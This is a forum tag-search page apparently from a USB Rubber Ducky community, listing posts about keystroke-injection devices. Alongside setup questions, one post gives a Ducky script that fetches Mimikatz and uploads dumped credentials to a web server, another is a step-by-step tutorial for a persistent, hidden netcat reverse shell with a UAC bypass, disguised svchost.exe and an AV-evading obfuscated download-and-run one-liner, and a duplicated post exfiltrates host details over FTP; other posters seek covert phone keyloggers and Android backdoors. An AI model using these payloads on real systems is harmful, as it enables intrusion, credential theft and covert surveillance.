Jump to content

Search the Community

Showing results for tags 'RubberDucky'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. Sorry, maybe there already is this kind of a topic out there... But anyway, I want to ask you guys if there is any way to injecting a keylogger or taking data from an iPhone like pictures or iMessages and storing it in the mail or somewhere else. This would be cool if somebody already managed to do something with an iPhone or iCloud data and would share some info about this for all of us. Thanks :)
  2. Hi everyone, I just got my RubberDucky to do some Windows Setup automation (yeah, boring stuff, no hacking sadly) and the first thing I want to do is to run cmd while being in the Windows Out Of Box Experience (OOBE). You can open the cmd with the combination Shift + F10, however when I try to run SHIFT F10 from the Ducky, it doesn't open cmd. Is this Key Combo not supported or am I missing something here? Thanks in advance for the help, Patrick
  3. Greetings, I have been toying around with my Rubber Ducky for a couple days now and I have been doing some tests on Windows 10 64bit mostly. I am currently running twinduck version: c_duck_v2_S002. I was ideally looking for a payload that would use mimikatz to extract the windows password from the current user and save it onto the ducky itself but none have worked yet. I also tried out the web server method with a local hosted apache2 web server(replacing the x's with my actual local hosted address): DELAY 1000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('192.xxx.x.xx/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('192.xxx.x.xx/rx.php', $output)" ENTER DELAY 15000 REM Clear the Run history and exit STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER STRING exit ENTER I can access both the files from the targeted system with my browser so the web server is working fine. I am listening with netcat but never receives the data?? With: 'nc -l -p 80'. What am I doing wrong here?
  4. Forgive me if I am asking impossible but I want to achieve this. I am giving my young teenage child a MacBook but I want to be able to see remotely what he is up to on it. He will be out of my house and living with his mother who is "very relaxed" about what he gets up to. I just want to be able to remotely keep an eye occasionally on what he is up to. I have a rubber ducky on its way, but realise that by the time I get my heard around learning how to script it will be too late he will already have the laptop. I will have the time to upload a large file.... but would also like to be able for this code to be both hidden in the system (in case any of his mates are hackers and check it out) and to be able to delete it later if I see he is behaving himself. The problem is he is very depressed and I am scared he will harm himself. If you can help, please contact me on avrahamblanck@protonmail.com
  5. Will a payload targeted at a Windows 7 OS still work on a Windows 10 OS, or are they completely different?
  6. Will a payload targeted at a Windows 7 OS still work on a Windows 10 OS, or are they completely different?
  7. Hey guys newbie here, i was wondering if there is a way / payload that if i save a backdoor.apk in the bash it auto installs in android phone? im making a android apk backdoor(rat) and im trying to find a way to make it auto install and run with the bas without internet? if not is there a way with usb rubber ducky? thanks in advance. sorry for my english :/
  8. I Have a few questions about the article "Stealing Files with the USB Rubber Ducky – USB Exfiltration Explained." I would like to know if that code for the payload would work for an OSX system and if it does not work what would be the changes needed for it to work. Also would I have tried to use the same payload for jpgs and photos but it does not seem to work, Is there a way for that to succeed or is it not possible. I would really appreciate it since that is the task I have been given. Thanks
  9. I Have a few questions about the article "Stealing Files with the USB Rubber Ducky – USB Exfiltration Explained." I would like to know if that code for the payload would work for an OSX system and if it does not work what would be the changes needed for it to work. Also would I have tried to use the same payload for jpgs and photos but it does not seem to work, Is there a way for that to succeed or is it not possible. I would really appreciate it since that is the task I have been given. Thanks
  10. Does anybody know how and if it is possible to open the Bios with the Rubberducky. I tried it with a script that just spams F1 and also with a script that presses F1 every half second. None of those worked. If i go into the bios mannually and then plug in the Rubber Ducky the script executes without a Problem.
  11. Got my rubber ducky today in the mail. Messed around with it for 30 minutes until I was taking the adapter out of my pc to put it away and the micro sd card flew out of it . I spent roughly 2 hours looking for it on my carpet floor before I gave up. I'm going to buy a replacement. What should I be looking for? I'm just nervous I spend 5 dollars on a 2gb micro sd just to return it. Thanks
  12. Link to my original reddit post So how do we create such reverse shell? Well, first of all you need to download netcat 1.12 and extract the nc64.exe. Once you got it extracted upload it to some file-hosting service of your choice, which provides DIRECT LINK (very important!!). I used Discord, works like charm and link doesn't expire. Second, you need to make yourself an .XML file which you're gonna need later for Task Scheduler. I believe scheduled tasks are rly good way to set up persistence, as well as escelating the file that it executes to NT Authority\SYSTEM privileges, while remaining stealthy. I already did the work for you. This is what it should look like. Just modify the arguments in the bottom to your IP/PORT. Once you got that done, save it and upload it for DIRECT LINK, just like you uploaded your previous file. Now, that the boring setup part is over, we get to the actual code that's being executed to achieve this type of shell: cd $env:public $url1="YOUR_NC64_LINK" $url2="YOUR_XML_LINK" $path1="$env:public\svchost.exe" $path2="$env:public\x.xml" (new-object net.webclient).downloadfile($url1,$path1) (new-object net.webclient).downloadfile($url2,$path2) cmd /r 'reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f&reg add "HKCU\Environment" /v "windir" /d "%comspec% /r mode 18,1&cd %public%&schtasks /create /tn \"Windows Update Assistant\" /f /xml x.xml >nul&schtasks /run /tn \"Windows Update Assistant\" /i >nul&REM "&timeout /t 1&schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul&timeout /t 1&reg delete "HKCU\Environment" /v "windir" /F&attrib +s +h svchost.exe&del /q x.xml' So first, it downloads both of your files via powershell, then it clears our Windows + R history to clear any traces of itself (if you're using USB RubberDucky). Then it uses this UAC bypass technique to create scheduled task called Windows Update Assistant, which is set to be executed to run with NT Authority\SYSTEM privileges in our .XML file. Then it marks our nc64.exe file as hidden system file, which is also now called svchost.exe and then it deletes our .XML file, since system doesn't need it anymore after task is created. Now you're probably thinking, this is all nice, but how the fk do I run this in one-line of code? Very simple, by invoking expression called DownloadString in powershell like this: powershell -nop -w 1 -c "iex (new-object net.webclient).downloadstring('YOUR_PASTEBIN')" But problem with this one-liner is, that it gets picked up by most AVs as "malicious activity". Therefore, we need to obfuscate it a bit: cmd.exe /c powershell -nop -w 1 -c "iex (.('ne'+'w-ob'+'ject') ('ne'+'t.webc'+'lient')).('do'+'wnloadstr'+'ing').invoke(('Y'+'OUR_'+'PASTEBIN'))" And there it is, this one liner will get you persistent reverse shell which will check for itself every minute if it's running and if it's not, then it executes itself silently in the background.
  13. Alright, so a friend gave me a USB hardware keylogger... the catch is that he doesn't remember the PIN. It's completely useless without the PIN since you need it to read stored keystrokes. So my idea is to use a rubber ducky to brute force in. The issue is that I'm not a programmer, and typing out every combination is not really worth it. So i was hoping that someone with some programming know how could send me a script, or a program to generate it. The keylogger PIN uses 3 digits, A-Z and 0-9 It works like a modifier key (Shift, Ctrl, Alt) so if the PIN was "ABC" then you would need to hold "A" then hold "B" then press "C" and release. Thanks to anyone who helps 😊
  14. Can i run a payload(meterpreter)(metasploit) on android with rubber ducky or bash bunny over (wan)
  15. When I plug my 64GB SDXC micro SD card formatted with the ex-fat format into the USB rubber ducky and then plug the Ducky into a computer, the led lit up red indicating an error I can verify that the micro SD card is inserted properly and is readable through an SD card reader leading me to believe that the USB rubber ducky is not compatible with SDXC Can anyone else verify ? And if i have to buy a replacement micro SD card what specs are required for optimal performance (size and type: SDHC, SDXC,SD-Card) ?
  16. I just got my rubber ducky, the script works like it should when it arrives, but when I put the Micro SD card in the adapter so I can edit the code it doesn't show up, there is a beep from windows saying a new usb drive is in the computer but there is nothing in 'This PC'.
  17. I just tried many of your products all used as mentioned in all your video’s and forums. Not one of all the products I bought from hak5 is working properly. it is doing nothing at all. Me on the other hand am busy all day with factory resetting and new configuration. i mean all of them. Really im a totally not satisfied customer and I wonder if you are able to get any of your products to work as you show us. i wonder if there is a totally satisfied customer at all. All the explanations in your video’s and books, just do not make the cut. your a not clear in the books. Explain it to us if we a kids of 7 year old and don’t leave information behind. Ever seen your own forums. There are so many questions the same. I think you have to get your act together. Besides that is your service getting real bad
  18. Hi there, Can I use teensy 2++ to use BadUSB exploit like a rubber ducky ?
  19. Wrote a ducky script to capture Computer Name, Username, IP address and Current Time stamp through a Powershell script. Never works the way I want after encoding it and using the BIN file. The RUN window never opens and nor does notepad. It randomly opens some excel file on the desktop and writes the STRING values there. The powershell commands at the end of the script seem to executed fine in the RUN window, but since the PS1 file is never created using notepad, they are useless. I feel it might have to do something with the encoding - I've tried GB and US (my keyboard layout is US). I have verified that the powershell script works otherwise. For encoding, I have tried both - encoder on DUCKTOOLKIT site as well as the local JAR encoder. I have also tried with all DELAYs more than 1000. Need help in figuring out what's going wrong? NOTE: the username, password and server were replaced with correct values in the actual script. Successfully verified the PS script. Ducky Script - DELAY 500 GUI R DELAY 500 STRING notepad DELAY 500 ENTER DELAY 1000 STRING $username = $env:username ENTER STRING $computername = $env:computername ENTER STRING $ipaddress = ([System.Net.DNS]::GetHostAddresses($env:computername) | Where-Object {$_.AddressFamily -eq "InterNetwork"} | select-object IPAddressToString)[0].IPAddressToString ENTER STRING $timestamp = (get-date).ToString('d-M-y HH:mm:ss') ENTER STRING $File = "C:\Users\$username\$computername.txt" ENTER STRING "Computername: $computername" >> $File ENTER STRING "Username: $username" >> $File ENTER STRING "IP-Address: $ipaddress" >> $File ENTER STRING "Time: $timestamp" >> $File ENTER STRING "`n" >> $File ENTER STRING $ftp = "ftp://username:password@server/Ducky/$computername.txt" ENTER STRING $webclient = New-Object System.Net.WebClient ENTER STRING $uri = New-Object System.Uri($ftp) ENTER STRING $webclient.UploadFile($uri, $File) ENTER STRING $wshell = New-Object -ComObject Wscript.Shell ENTER STRING $wshell.Popup("Bazinga",0,"OOPS",0x1) DELAY 3000 CTRL s DELAY 1000 STRING %TEMP%\cache.ps1 TAB DELAY 1000 DOWNARROW DOWNARROW DELAY 2000 ENTER ALT s DELAY 1000 ALT F4 DELAY 1000 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 500 ALT y DELAY 500 STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 500 STRING powershell.exe -windowstyle hidden -File %TEMP%\cache.ps1 ENTER
  20. Is there any sort of website or something that can help get me more familiar with terms in the coding/hacking world? Thank you.
  21. Hi, I'm trying to use a ducky to automate some stuff on a macbook :-) But it has this funky Azerty layout (see image). I encoded it with "-l resources/be.properties" and that worked fine, except for one character: the at-sign "@", this renders as "ë". So I was thinking, maybe I should create a properties-file for this keyboard layout. But how do I do this? Any thoughts?
  22. So I got a rubber ducky 4 days ago and I been looking at all the YouTube videos but none them explain it well they all go straight to coding instead telling me what to download and what tools I need. I want to be able to steal passwords etc the computer login pass I saw that on YouTube. The is one when you can do a RAT? To control someone screen or view ther file. The also one where it saves passwords and emails it to yourself. Just want to be able to complete something that actually works not the 'hello world'. Like this script (what does it do and how can I make it work) https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload-Netcat-Reverse-Shell I really want to try this one too https://www.hak5.org/blog/15-second-password-hack-mr-robot-style So yeah just need help with it like step by step what I need to install or setup!
  23. Sometimes I have issues with Q LEFT/QUACK LEFTARROW when running scripts. Even by increasing the DELAYs I'll sometimes find the script hitting ENTER on 'no'. It's not the worst problem in the world, as I just press the left arrow myself, but it's more ideal for the script to do the whole job. Anyone else have this issue and know a solution?
  24. I'm having trouble writing a powershell script that will 'exit' the terminal after running the code. This problem occurs when using a Quack script on the Bash Bunny. Here's the end part of the Ducky script into that I wrote: I pretty sure that's correct, and it should exit after deleting a file called ip.txt However, no such luck. What I have tried to solve the problem: STRING EXIT STRING Exit STRING exit; STRING del ip.txt; exit; But, no of these make a difference. I even checked a Ducky script written by DarrenHak5 who has the same way of exiting the powershell terminal. So, I can't understand why it's not working for me. If I manually type exit it will do so, if the HID type it, it will not exit. Guys, do you have any suggestions? Thanks
  25. Wrote a ducky script to capture Computer Name, Username, IP address and Current Time stamp through a Powershell script. Never works the way I want after encoding it and using the BIN file. The RUN window never opens and nor does notepad. It randomly opens some excel file on the desktop and writes the STRING values there. The powershell commands at the end of the script seem to executed fine in the RUN window, but since the PS1 file is never created using notepad, they are useless. I feel it might have to do something with the encoding - I've tried GB and US (my keyboard layout is US). I have verified that the powershell script works otherwise. For encoding, I have tried both - encoder on DUCKTOOLKIT site as well as the local JAR encoder. I have also tried with all DELAYs more than 1000. Need help in figuring out what's going wrong? NOTE: the username, password and server were replaced with correct values in the actual script. Successfully verified the PS script. Ducky Script - DELAY 500 GUI R DELAY 500 STRING notepad DELAY 500 ENTER DELAY 1000 STRING $username = $env:username ENTER STRING $computername = $env:computername ENTER STRING $ipaddress = ([System.Net.DNS]::GetHostAddresses($env:computername) | Where-Object {$_.AddressFamily -eq "InterNetwork"} | select-object IPAddressToString)[0].IPAddressToString ENTER STRING $timestamp = (get-date).ToString('d-M-y HH:mm:ss') ENTER STRING $File = "C:\Users\$username\$computername.txt" ENTER STRING "Computername: $computername" >> $File ENTER STRING "Username: $username" >> $File ENTER STRING "IP-Address: $ipaddress" >> $File ENTER STRING "Time: $timestamp" >> $File ENTER STRING "`n" >> $File ENTER STRING $ftp = "ftp://username:password@server/Ducky/$computername.txt" ENTER STRING $webclient = New-Object System.Net.WebClient ENTER STRING $uri = New-Object System.Uri($ftp) ENTER STRING $webclient.UploadFile($uri, $File) ENTER STRING $wshell = New-Object -ComObject Wscript.Shell ENTER STRING $wshell.Popup("Bazinga",0,"OOPS",0x1) DELAY 3000 CTRL s DELAY 1000 STRING %TEMP%\cache.ps1 TAB DELAY 1000 DOWNARROW DOWNARROW DELAY 2000 ENTER ALT s DELAY 1000 ALT F4 DELAY 1000 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 500 ALT y DELAY 500 STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 500 STRING powershell.exe -windowstyle hidden -File %TEMP%\cache.ps1 ENTER
×
×
  • Create New...